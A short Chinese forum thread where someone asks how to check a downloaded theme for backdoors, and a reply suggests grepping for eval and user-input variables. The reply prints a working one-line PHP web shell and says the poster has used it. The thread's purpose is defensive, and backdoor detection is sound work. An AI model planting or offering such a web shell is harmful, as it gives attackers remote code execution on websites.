这个主题太漂亮啦!我想使用他,但是担心有恶意代码/后门。请问怎么确认他是安全的呢?
正所谓 防人之心不可无 嘛。。呃,求高手支招!
这个也没啥万能工具吧... 最好还是一个一个文件审查.
php后门, 可能最常用的是eval(xxx), 这种倒是容易捉,带有比较明显的关键词.可以搭配grep/ack扫这些关键词.
不好捉的倒是这种强悍的
<?php ($_=@$_GET[2]).@$_($_POST[1])?> (这个我还真用过)
更多强悍的后门: http://www.freebuf.com/articles/web/9396.html
还真没啥特殊关键词吧! 所以最好还是一个一个文件的找.
javascript这一块也得瞧瞧.
update, 仔细想想,这些后门,输入都是得从用户这边过来. 所以可以这样查grep -nHP -A 3 -B 3 '\$_[A-Z]' -r .